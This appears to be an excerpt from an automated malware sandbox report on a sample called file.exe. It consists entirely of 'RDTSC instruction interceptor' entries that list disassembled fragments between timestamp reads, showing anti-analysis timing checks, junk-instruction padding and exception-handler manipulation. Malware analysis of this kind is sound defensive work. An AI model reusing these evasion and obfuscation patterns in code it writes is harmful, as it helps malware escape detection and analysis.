    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C80 second address: 8B6C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7760 second address: 8B7766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7985 second address: 8B7993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CB4E5A4CAh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7766 second address: 8B776C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7993 second address: 8B79F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F2CB4E5A4D0h 0x0000000f nop 0x00000010 jmp 00007F2CB4E5A4CFh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F2CB4E5A4C8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D35F9h] 0x00000037 mov esi, dword ptr [ebp+122D35F9h] 0x0000003d push 00000000h 0x0000003f mov si, ax 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jp 00007F2CB4E5A4C6h 0x0000004c push eax 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B776C second address: 8B7770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B79F9 second address: 8B79FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB0E5 second address: 8BB163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D1DE8h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F2CB4F07458h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov bh, A2h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F2CB4F07458h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D365Dh] 0x00000052 push eax 0x00000053 pushad 0x00000054 jp 00007F2CB4F0745Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB163 second address: 8BB17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2CB4E5A4D4h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE0B5 second address: 8BE0BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE0BA second address: 8BE10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F2CB4E5A4C8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, 3346B884h 0x00000029 push 00000000h 0x0000002b jg 00007F2CB4E5A4CCh 0x00000031 mov ebx, dword ptr [ebp+122D382Dh] 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F2CB4E5A4CDh 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF235 second address: 8BF28C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F2CB4F07464h 0x00000011 jmp 00007F2CB4F0745Eh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F2CB4F07458h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, DE05h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D304Eh] 0x0000003d push 00000000h 0x0000003f mov bx, 61F2h 0x00000043 xchg eax, esi 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF28C second address: 8BF290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF290 second address: 8BF2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2CB4F0745Ch 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC32F second address: 8BC3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edi 0x00000007 jp 00007F2CB4E5A4C8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 nop 0x00000011 sub dword ptr [ebp+12477E83h], edi 0x00000017 jmp 00007F2CB4E5A4D1h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2642h], ecx 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jne 00007F2CB4E5A4E6h 0x00000038 mov eax, dword ptr [ebp+122D0165h] 0x0000003e pushad 0x0000003f xor dword ptr [ebp+122D34C0h], esi 0x00000045 jmp 00007F2CB4E5A4D3h 0x0000004a popad 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F2CB4E5A4C8h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 mov edi, edx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3E4 second address: 8BC3E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3E8 second address: 8BC3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD334 second address: 8BD338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3EE second address: 8BC3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD338 second address: 8BD33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3F4 second address: 8BC3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD423 second address: 8BD428 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE34C second address: 8BE35E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F2CB4E5A4C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF3FC second address: 8BF417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF417 second address: 8BF41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF41B second address: 8BF41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0500 second address: 8C0506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0506 second address: 8C050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C050B second address: 8C0510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0510 second address: 8C0516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2345 second address: 8C23C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F2CB4E5A4CEh 0x00000010 jnc 00007F2CB4E5A4C8h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F2CB4E5A4C8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov bh, E8h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F2CB4E5A4C8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D1EB6h] 0x00000055 push 00000000h 0x00000057 mov ebx, dword ptr [ebp+122D31CCh] 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 pop edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C23C2 second address: 8C23C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C23C8 second address: 8C23CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C168A second address: 8C16AE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007F2CB4F07456h 0x00000013 jg 00007F2CB4F07456h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F2CB4F07456h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C16AE second address: 8C16B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C24CE second address: 8C24E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C603E second address: 8C6042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C805F second address: 8C806A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2CB4F07456h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C806A second address: 8C8070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8070 second address: 8C8080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8080 second address: 8C8085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8085 second address: 8C808C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C52C9 second address: 8C52CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C53B1 second address: 8C53B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C623A second address: 8C62D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4E5A4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F2CB4E5A4C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, 504600C8h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jc 00007F2CB4E5A4CAh 0x00000040 mov di, C786h 0x00000044 mov eax, dword ptr [ebp+122D0201h] 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007F2CB4E5A4C8h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 cld 0x00000065 mov edi, esi 0x00000067 push FFFFFFFFh 0x00000069 mov bx, 39B6h 0x0000006d mov bl, ah 0x0000006f push eax 0x00000070 pushad 0x00000071 jmp 00007F2CB4E5A4CFh 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C62D2 second address: 8C62D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9135 second address: 8C9139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9139 second address: 8C91AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2CB4F07466h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F2CB4F07458h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D38B5h] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 jnl 00007F2CB4F07458h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b mov ebx, 494DC231h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F2CB4F07467h 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7263 second address: 8C7267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3481 second address: 8C349E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA154 second address: 8CA158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA158 second address: 8CA1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F2CB4F07458h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 add dword ptr [ebp+122DB6A5h], edx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F2CB4F07458h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 adc bx, 8A81h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007F2CB4F07458h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007F2CB4F07461h 0x0000006e jmp 00007F2CB4F0745Bh 0x00000073 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA1E0 second address: 8CA203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jo 00007F2CB4E5A4C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C93B3 second address: 8C93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C93B9 second address: 8C93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F2CB4E5A4C6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2EE second address: 8CA2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2F8 second address: 8CA2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2FC second address: 8CA313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CB4F0745Dh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873635 second address: 87363B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87363B second address: 873658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2CB4F07462h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873658 second address: 87365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87365C second address: 873660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2AB3 second address: 8D2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D2D second address: 8D7D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D37 second address: 8D7D8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e pop ebx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jns 00007F2CB4E5A4D9h 0x0000001a jmp 00007F2CB4E5A4D3h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F2CB4E5A4CEh 0x0000002a push eax 0x0000002b pop eax 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D8E second address: 8D7DA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F2CB4F07456h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007F2CB4F07460h 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCE2F second address: 8DCE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCE33 second address: 8DCE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4F07456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCF94 second address: 8DCFC0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2CB4E5A4D4h 0x00000010 jng 00007F2CB4E5A4C6h 0x00000016 jc 00007F2CB4E5A4C6h 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCFC0 second address: 8DCFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2CB4F07456h 0x0000000a je 00007F2CB4F07456h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCFD0 second address: 8DCFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD14F second address: 8DD159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD403 second address: 8DD407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD93E second address: 8DD973 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CB4F07456h 0x00000008 jmp 00007F2CB4F07467h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4F07462h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD973 second address: 8DD979 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E06CF second address: 8E06D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8787 second address: 8E878B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E878B second address: 8E87A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07468h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
